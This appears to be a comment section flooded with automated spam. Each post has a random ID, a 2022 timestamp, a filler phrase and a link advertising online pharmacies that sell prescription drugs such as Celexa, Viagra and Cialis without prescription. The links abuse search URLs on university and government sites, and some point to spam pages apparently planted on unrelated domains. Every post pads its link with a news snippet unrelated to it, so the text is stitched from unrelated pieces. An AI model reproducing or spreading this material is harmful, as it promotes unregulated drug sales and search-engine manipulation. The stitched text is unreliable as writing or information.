There's a three month trial period https://www.bakeru.edu/?s=Baikal%20Online%20Pharmacy%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Buy%20Celexa%20Baikal-pharmacy%20Com%20-%20Buy%20Celexa%20Baikal%20Pharmacy buy celexa baikal-pharmacy com A well-wisher takes a picture using a cell phone of a banner with the image of former South African President Nelson Mandela, outside the Medi-Clinic Heart Hospital where he is being treated, in Pretoria July 18, 2013.

bu2LcI
4/4/2022 9:49:25 AM

This is the job description https://publichealth.wustl.edu/page/7/?s=Baikal%20Online%20Pharmacy%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Buy%20Celexa%20Baikal%20Pharmacy%20Com%20-%20Buy%20Celexa%20Baikal-pharmacy buy celexa baikal pharmacy com he did not support to "blow" El Aqza site, and he insisted as many other orthodox Rabbies that the Jews should not go up their from a religion reason,as we never know where the holliest room of the temple was ,a Jew must not enter the Temple site,

BgIiH
4/4/2022 9:49:29 AM

In a meeting https://paidleave.wa.gov/?s=Baikal%20Online%20Pharmacy%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Buy%20Celexa%20Baikal%20Pharmacy%20Com%20-%20Buy%20Celexa%20Baikal-pharmacy%20Com buy celexa baikal pharmacy com The study, published in the April 20 issue of the journal PLOS ONE, also could have implications for bacterial research on Earth. It's possible that this kind of research could help scientists and doctors more effectively limit the spread of infection in hospitals, Collins said.

2AaIe
4/4/2022 9:49:34 AM

Children with disabilities https://geiselmed.dartmouth.edu/?s=Baikal%20Online%20Pharmacy%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Buy%20Celexa%20Baikal-pharmacy%20-%20Buy%20Celexa%20Baikal-pharmacy%20Com buy celexa baikal-pharmacy Since taking office in December, Pena Nieto has been pushing a reform agenda to boost growth and investment. Lawmakers are currently debating a bill that would open up the state-run energy sector to greater private investment.

KtI3m3
4/4/2022 9:49:38 AM

Do you like it here? https://binus.edu/?s=Baikal%20Online%20Pharmacy%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Buy%20Celexa%20Baikal%20Pharmacy%20Com%20-%20Buy%20Celexa%20Baikal-pharmacy buy celexa baikal pharmacy com Heavy construction equipment was used around 5 p.m. to break the newly rebuilt boardwalk to create a fire line of sorts to stop the fire from spreading, Toms River Police Chief Michael Mastronardy told WCBS 880.

isVZ7o
4/5/2022 6:43:37 AM

Whereabouts in are you from? http://victimasconsejobusqueda.congresocdmx.gob.mx/victimas/curriculums/vista/2?page=4523 buy celexa baikal-pharmacy com A Microsoft spokesman said: "If someone in the UK tries to use search terms on Bing which can only indicate they are looking for illegal child abuse content, they will activate the Bing Notification Platform which will produce an on-screen notification telling them that child abuse content is illegal.

orFGRh
4/12/2022 8:51:39 PM

Have you got a telephone directory? https://krplas.com/stmap_21snbbax.html?cialis.betamethasone.seroflo.nalidixic clindamycin 300 n2 wieviele tabletten Jagland did not fix blame on who used the weaponry and who were its victims. Assad claims the rebels fighting his regime are responsible. A U.N. investigation has made no determination of who is to blame, but investigators for the USA, France and Israel have said there was no doubt that Assad's regime, which admits it has stocks of such weapons, is responsible.

MhtcQ
4/12/2022 8:51:44 PM

Yes, I love it! https://butiaonline.com.br/stmap_62kqmdaq.html?elavil.finasteride.furadantin.cialis how to flonase sensimist “He was once a great leader who took on the communists and gained democracy for Poland,” he says. “Now, he often proposes theses that don’t reflect reality, are wrong and even disgrace his reputation. I think that’s how the majority of Polish society perceives him.”

a7RLK1
4/12/2022 8:51:49 PM

Very interesting tale https://orpheogroup.com/stmap_21wizxfu.html?atomoxetine.cipro.cialis prevacid 24hr canada “There are some signs that we may now be on such a trajectory – and that is the reason I think keeping Bank rate and [QE] at their current levels is the right policy for now.” He added that he believed the signs of growth were “durable”.

KZqqwp
4/12/2022 8:51:54 PM

How much will it cost to send this letter to ? http://phatfabe.com/stmap_21snbbax.html?motrin.viagra.mobic ciprofloxacin drug bank Strains were on show earlier this year at EGPC, when a newround of staff changes and dismissals was announced by theMuslim Brotherhood-led government. A diplomat who was presentsaw angry officials bang on the chairman's door.

JoM87
4/12/2022 8:51:59 PM

Good crew it's cool :) https://www.enlightenedtraining.com/stmap_21wizxfu.html?voveran.fulvicin.viagra auro mirtazapine for sleep The RTM build is not usually change until the General Availability or GA. However, the software maker will continue to fix small bugs in between this version and the general availability in October, which will be distributed via the updates from Windows Update a few days after the public availability.

5OjW5
4/12/2022 9:21:04 PM

We'd like to invite you for an interview https://45so.org/stmap_62kqmdaq.html?monohydrate.levitra.flurbiprofen pastillas meloxicam precio "That's something the White House is refusing us," said Rep. Jason Chaffetz, a Republican member of the House Committee on Oversight and Government Reform, which will hear more Benghazi testimony Thursday.

8KaFv
4/12/2022 9:21:15 PM

Get a job http://www.designcure.co.uk/stmap_62vpkwfl.html?perindopril.cialis.fluticasone diclofenaco con paracetamol farmacia del ahorro "They still aren't taking the blame," said Christiane, a woman who lived near the blast site and declined to give her last name. "First it's the firemen, now the engineer, who will they blame tomorrow?"

mgzV6
4/12/2022 9:21:26 PM

I can't get a signal http://www.designcure.co.uk/stmap_94gyirtx.html?mefenamic-acid.cialis.toradol citalopram hexal 20 mg nebenwirkungen Family-friendly filters will be the default setting for new broadband customers by the end of the year and only account holders will be able to change them. Existing customers will be presented with an “unavoidable decision” about installing the filters by the end of the 2014, Mr Cameron said.

LsZcJh
4/12/2022 9:21:48 PM

Did you go to university? https://www.goodworkint.com/stmap_21snbbax.html?cycrin.levitra.pravachol.ansaid obat doxycycline untuk kucing “(With the first unit) we’d like to get off to a better start defensively,” Pierce said. “But I thought after that first quarter we started in the second quarter playing better defense. That’s what we’re going to hang our hat on every night.”

ZXxHUw
4/12/2022 9:21:57 PM

Thanks funny site https://butiaonline.com.br/stmap_62kqmdaq.html?ditropan.ampicillin.viagra.minipress metformin er recall side effects All told, officials said, the campaign saved an estimated 300,000 years of life that otherwise would have been lost to smoking-related disease, which remains the leading cause of preventable death in the United States, killing more than 1,200 Americans each day.

23dcva
4/12/2022 9:49:39 PM

I've been cut off https://krplas.com/stmap_94vqjxxy.html?fosamax.cialis.bystolic.diphenhydramine quetiapine 25mg tablet price "The third-generation of Kindle tablets mark another meaningful step forward, and increasingly differentiate Kindle Fire from the increasingly crowded tablet market," Robert W Baird analyst Colin Sebastian said on Wednesday.

UQbDhY
4/12/2022 9:49:43 PM

I like it a lot https://butiaonline.com.br/stmap_94vqjxxy.html?levitra.lasix.hydroxyzine allegra cole instagram U.S. stocks will remain range-bound until resolution of nextweek's Fed meeting, the ongoing U.S.-Russian talks on Syria andthe looming fiscal crisis in Washington, said Jim Paulsen, chiefinvestment officer at Wells Capital Management in Minneapolis.

Iid7ir
4/12/2022 9:50:02 PM

A financial advisor https://krplas.com/stmap_94vqjxxy.html?ayurslim.styplon.levitra.mefenamic-acid para que es el triamcinolone acetonide After Lederhaas-Okun left the company in February in adownsizing, Tiffany took inventory and found she checked out 165pieces that had not been returned, according to the complaintfiled at the time of her arrest.

rFy5Ma
4/12/2022 9:50:12 PM

I never went to university http://phatfabe.com/stmap_62kqmdaq.html?slimfast.levitra.retin-a fucidin ointment 2 uses Blemi and others like her say the law leaves them with no future. "We don't have birth certificates that the children must have to study. We don't exist," said Blemi, a mother of three young children, the youngest only a month old.

wuBkqU
4/12/2022 9:50:17 PM

I can't stand football https://45so.org/stmap_94vqjxxy.html?viagra.naprelan.liv.52 ivermectin for dogs tractor supply “While southern Europe continued being affected by the current economic situation, the Ikea Group continued gaining market shares in almost all markets,” the retailer said in a statement ahead of its full-year results, which will be published in January. The group will be hoping to improve on its 2011/12 performance when profits slumped 20pc to £19.8m, its worst result since 2009.

wH9co
4/13/2022 12:16:46 AM

Some First Class stamps https://4dretailtech.com/stmap_21wizxfu.html?viagra.megalis.sparfloxacin.ketoconazole synthroid shortage News of a deal - which had threatened to boil over into awider trade war covering wine and steel - helped push up sharesin Shanghai-listed solar panel makers Hareon Solar and Shanghai Chaori on Monday, outperforming a 1.7percent drop on the Shanghai Composite Index.

shyKKR
4/13/2022 12:16:51 AM

I do some voluntary work https://www.goodworkint.com/stmap_62kqmdaq.html?albuterol.famvir.clomid.levitra metoprolol succinate dosing All these maneuvers demand a level of fitness that requires the seemingly simple act of getting started, which highlights a major health benefit: "Anything that encourages people to work for the event, to get up in the morning and get out of bed and go strength train and run, I think that's a great thing," Kimbel says. "When people are motivated to finish races like this, it gets them out running, it gets them out training for it and that's a good thing."

BMTWb
4/13/2022 12:16:56 AM

Have you got any qualifications? https://www.enlightenedtraining.com/stmap_94gyirtx.html?levodopa.cialis.eurax orlistat emagrece mesmo ou mito Congress lets most Americans defer only small sums, from the thousands to a few tens of thousand, but those at the top can defer unlimited sums. Defer for 30 years, any good tax attorney will tell you, and you have achieved the economic equivalent of not paying the tax. Invest untaxed money, borrow against the gains from that untaxed money and you pay no tax.

WpKSKw
4/13/2022 12:38:09 AM

I'm sorry, she's http://phatfabe.com/stmap_94vqjxxy.html?viagra.methoxsalen.speman atarax 10mg side effects A few dozen House members Wednesday morning successfully coerced a reluctant Speaker John Boehner into tying the Obamacare language to a must-pass government funding bill. This came after weeks of television ads featuring Cruz and fellow Senate Republican Mike Lee advocating exactly that plan, regardless of the consequences.

nAJqd
4/13/2022 12:38:17 AM

We need someone with experience https://www.qnez.net/stmap_21wizxfu.html?viagra.advair.stavudine.pristiq 24 hour pharmacy 74354 In the days ahead, the rest of their Republican House colleagues have an important choice to make – to sheepishly follow groups that are currently existing solely to attack Republicans, while ignoring the Democrats, or to focus on winning the long-term war, and not a one day battle with a pre-determined outcome. 

1WovS
4/13/2022 12:38:21 AM

Will I have to work shifts? https://krplas.com/stmap_94vqjxxy.html?levitra.atenolol.manforce buy diclofenac gel baikal-pharmacy com "People are hungry for information on finding the security and peace of mind that come with affordable healthcare coverage," HHS Secretary Kathleen Sebelius told reporters. Navigators will undergo 20 to 30 hours of training by HHS, with an emphasis on securing people's privacy, and will be paid through the grants.

OcipH
4/13/2022 12:38:26 AM

Enter your PIN http://www.designcure.co.uk/stmap_94gyirtx.html?benzoyl.cialis.vasotec.acetate ciprodex list of side effects "Had U.S. fiscal matters not been so problematic, and incoming data on real GDP and employment stronger, it may well have been appropriate to take some action in September," he said. "A policy that is data dependent cannot always be 'signaled' clearly, in advance."

9LxK6G
4/13/2022 12:38:39 AM

A few months https://www.qnez.net/stmap_62vpkwfl.html?rulide.ursodeoxycholic.viagra.bromocriptine dramamine vr Executives from U.S. and European companies will be seekingnew opportunities to meet with Iranian oil officials on neutralground, industry sources said. U.S. and European companiescontacted by Reuters declined comment for this story.

E4L5h2
4/19/2022 11:37:36 AM

http://imrdsoacha.gov.co/silvitra-120mg-qrms

jKQtM
5/5/2022 3:30:18 PM

this post is fantastic https://api.melkamwetat.negarit.net/stmap_19xorppt.html?celecoxib.cialis.tretinoin flexium gel vs voltaren They are familiar now but I can never forget their impact in that memorable spot. He had a dream, a dream deeply rooted in the American Dream. That dream was one that I have long believed in, and one that was part of the inspiration that caused me to move from my home country to the United States. When he said that we should all "sit down together at the table of brotherhood," I found that resonated with my own experience in this country.

o924bG
5/5/2022 3:30:23 PM

Could you send me an application form? https://nca-api.whagons.com/stmap_19zwkycw.html?cialis.b12.ribavirin vari betamethasone According to the Irish College of Ophthalmologists (ICO), regular eye tests are essential for maintaining healthy eyes, as they can identify the early signs of diseases such as glaucoma, cataract and age-related macular degeneration (AMD).

zgQ15w
5/5/2022 3:30:29 PM

I'm happy very good site https://api.melkamwetat.negarit.net/stmap_19xorppt.html?tadalis.viagra.mebeverine seroquel 300 mg for sleep The Brent-WTI spread trade has gripped markets this month,narrowing from near $6 at the start of July and over $23 abarrel in February on expectations new pipeline capacity willalleviate a glut of oil at the Cushing, Oklahoma delivery pointfor the U.S. crude contract by shipping it to the Gulf Coast.

SrTsFp
5/5/2022 3:30:44 PM

I'll text you later https://api.melkamwetat.negarit.net/stmap_19xorppt.html?forte.viagra.prednisolone sparta pharmacy The Hong Kong office of JPMorgan also hired Zhang Xixi, thedaughter of a now-disgraced Chinese railway official, and wenton to help advise his company, which builds railways for theChinese government, on its plans to become a public company, theTimes said.

YVqu8V
5/5/2022 3:30:48 PM

Recorded Delivery https://api.staging-api.mapandmatch.com/stmap_54yebbug.html ofloxacin oz pet Data from HiFX, a foreign exchange broker, shows Britishimporters and exporters increased currency transactions by 24percent in the first half of the year compared with the previoussix months, a trend they said continued into the third quarter.

VMaEz
5/5/2022 7:43:21 PM

Where did you go to university? https://api.staging-api.mapandmatch.com/stmap_54yebbug.html?levitra.topamax.alavert alphagan p dosage At the 14th, Woods hit his drive on the other side of the cart path beneath a canopy of huge trees to the right. He was forced to hit a low, hard, slicing shot to the green that ran to the back fringe. From there, he chipped 10 feet past but rolled in the par putt.

8xVnq
5/5/2022 7:43:25 PM

I'm on a course at the moment https://godaniofficial.com/stmap_31monane.html?naltrexone.viagra.oxcarbazepine.acivir quitting flomax side effects The American, who was identified only by the initials "P.E.", needed emergency surgery to remove his spleen, which burst when the bull gored him, and was said to be stable in hospital. The Spanish man sustained injuries in his groin, knee and thigh.

U4A5o
5/5/2022 7:43:30 PM

I work here http://telemedicin-stage2-demo321-com.stage2.demo321.com/stmap_54xzbfos.html?selegiline.levitra.pentasa albendazole for chickens "The data point is likely unsurprising as the trend in our survey has been moving toward Twitter over the past couple of years," said analysts Gene Munster and Douglas Clinton in a note to clients.

7Ap3Uc
5/5/2022 7:43:35 PM

A packet of envelopes http://telemedicin-stage2-demo321-com.stage2.demo321.com/stmap_31fqfoiz.html harga vitamin c amway malaysia Monte dei Paschi is also under investigation in the probe for a range of alleged crimes including market manipulation and making false statements to the market, as are its former chairman Giuseppe Mussari, its former director general Antonio Vigni and seven other former bank employees.

R8jya
5/5/2022 7:43:39 PM

I'd like to send this parcel to https://api.covidfollowupportal.negarit.net/stmap_19xorppt.html?acetaminophen.viagra.mefenamic-acid.ornidazole panadol baby drops woolworths They hope that the initiative will help frail older people who might not qualify for a carer to retain their independence while also providing cheap accommodation for people struggling to afford rising rents and house prices.

ToJTEx
5/20/2022 6:44:11 AM

I'd like to tell you about a change of address https://dev.api.mosbeautyshop.com/stmap_19xorppt.html?plendil.levitra.prinivil.avana sulfamethoxazole tmp ds tablet good for sinus infection HGB: He's done four tweets and I've done zero. Q: You address some of it in the book. There's GPS-run farm equipment, Judea Pearl's application of Bayesian networks and Clay Mitchell's "farm of the future." Is Silicon Valley involved enough in this area? Where can engineers and technology companies really make a difference?

Ifabu1
5/20/2022 6:44:18 AM

I'll put her on https://test.produkter.furnes.se/stmap_54yebbug.html?dramamine.cialis.furadantin vitaros 3 mg g krm cena That doesn't mean you can set a nitwit in front of a cluttered desk and end up with another Einstein, who is said to have muttered these immortal words: "If a cluttered desk is a sign of a cluttered mind, of what, then, is an empty desk a sign?"

CUeFE
5/20/2022 6:44:26 AM

An estate agents https://dev.api.mosbeautyshop.com/stmap_54xzbfos.html?levitra.tretinoin.precose megalis 10 for male in hindi Spears prevailed in a similar appeal back in 2008 and was sprung from a two-week psychiatric hold at UCLA Medical Center against her parents' wishes — even though her dad had a temporary conservatorship order in place.

iM1H05
5/20/2022 6:44:49 AM

I'm a partner in https://gyanvitaranam.media/stmap_19zwkycw.html?vasotec.levodopa.viagra.propranolol naproxeno sodico 550 mg composicao At the plate, the 14-time All-Star didn’t have an official at-bat but reached base four straight times, drawing full-count walks in his first two trips, as well as in his final appearance in the seventh. Rodriguez also swung through a 3-0 pitch before walking ahead of Jose Pirela’s three-run homer in the fifth.

j9nYb
5/20/2022 6:44:58 AM

I'd like to send this parcel to https://massivetradinginvestment.com/stmap_31fqfoiz.html?citrate.viagra.tadagra methpica metformin 500 mg obat apa The Food Stamp Program administered by the U.S. Agriculture Department provides paper coupons or debit cards for low-income people to buy food. But states can ask for the work requirement to be added, which Oklahoma and Kansas have done.

oh0nH
5/20/2022 9:44:59 AM

Children with disabilities http://banlaophen.go.th/stmap_54xzbfos.html?ventolin.levitra.sublingual.cymbalta low dose elavil and weight gain Most of these visitors are Chinese and many choose to stayclose to home, heading to Macau, the only place in China wherecasino gambling is legal and where gaming revenues grew by morethan a fifth last month to just over $3.5 billion.

pLC9I
5/20/2022 9:45:23 AM

Do you know the address? http://devinswany.com/stmap_54yebbug.html?acetazolamide.viagra.tylenol gel de tratamento antiacne dermotivin benzac bom The telecoms group wil likely call a board meeting ahead ofthe Nov. 7 one following a request by one investor to removeboard members appointed by key shareholder Telco, Il Sole 24 Oresaid on Saturday. A date should be announced early next week.

qifet2
5/20/2022 9:45:30 AM

Did you go to university? https://gyanvitaranam.media/stmap_19zwkycw.html?viagra.clomid.loratadine sildenafil stada 100mg filmtabletten 12 st “I think a tip could easily be perceived in China as something a little bit negative, whereas in the US it’s expected,” says David Ahlstrom, professor of management at the Chinese University of Hong Kong. “I give tips in China and I get some funny looks. And now I see why. I guess they see it as something like a bribe.”

kT0QF
5/20/2022 9:45:37 AM

One moment, please http://diglynden.com/stmap_54xzbfos.html?tadalista.cialis.cilostazol acyclovir injeksi Intel is not the only technology company trying to revolutionize the TV industry, where Comcast Corp, Time Warner Cable Inc and DirecTV are players and have much to lose from potential new entrants. Apple Inc, Google Inc and Amazon.com Inc are believed to be working on their own new TV services and products.

5aZ2t
5/20/2022 9:45:53 AM

I'm doing a phd in chemistry https://gyanvitaranam.media/stmap_31monane.html?cardura.lamotrigine.cialis pilule desogestrel biogaran Rodriguez left PNC Field around 2:15 p.m. in a white GMC Yukon driven by girlfriend Torrie Wilson, adding that he's "very confident" in getting favorable results from the MRI and an examination by team doctor Chris Ahmad.

hsslv
6/17/2022 5:22:05 PM

A few months http://ponce.inter.edu/?s=Buy%20Cheap%20Viagra%20Online%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Wordpress%20Viagra%20Hack%20In%20Header%20-%20Netpharm%20Viagra%20Bestellen wordpress viagra hack in header Another person familiar with the aircraft's configuration said the damaged area appears close to galleys and environmental control systems, but added that it was too early to link the fire to any specific equipment.

8MZLRZ
6/17/2022 5:22:14 PM

Looking for work http://ponce.inter.edu/?s=Buy%20Cheap%20Viagra%20Online%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Viagra%2020%20-%20Bestille%20Viagra%20P%20Nettet viagra 20 Myers said when people think of their personal safety, theytend to think about intentionally inflicted injuries, such asbeing attacked or shot. But the researchers found that the riskof dying from an accidental injury is 40 percent higher in thenation's most rural counties than in its most urban.

qDW3A
6/17/2022 5:22:26 PM

Your account's overdrawn https://www.bridgewaternj.gov/?s=Buy%20Cheap%20Viagra%20Online%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Viagra%20Est%20Il%20Efficace%20-%20Viagra%20Prodaja%20Cena viagra prodaja cena Those eager to see such ballot measures in 2014 say successful campaigns in Washington state and Colorado, followed by the August release of a U.S. Justice Department memo giving states leeway to experiment with legalization, underscore a shift in public sentiment that should be quickly capitalized.

RPh3JL
6/17/2022 5:22:41 PM

I work for a publishers http://ponce.inter.edu/?s=Buy%20Cheap%20Viagra%20Online%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Viagra%20Buy%20Manchester%20-%20Buy%20Viagra%20Belarus viagra buy manchester A Ministry of Defence spokesman said: “I can confirm that on March 8, 2013, three Royal Marines were arraigned and pleaded not guilty to a joint charge of ‘Murder of an Unknown Captured Person’.

oOp7T
6/17/2022 5:22:49 PM

The United States http://ponce.inter.edu/?s=Buy%20Cheap%20Viagra%20Online%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Viagra%20Sans%20Ordonnance%20Prix%20-%20Viagra%20Generic%204rx viagra generic 4rx Amazon said it is looking to fill more than 5,000 new full-time jobs at 17 of its fulfillment centers across the United States. That's roughly a 25 percent increase in full-time fulfillment center staff, which currently number more than 20,000 in the country.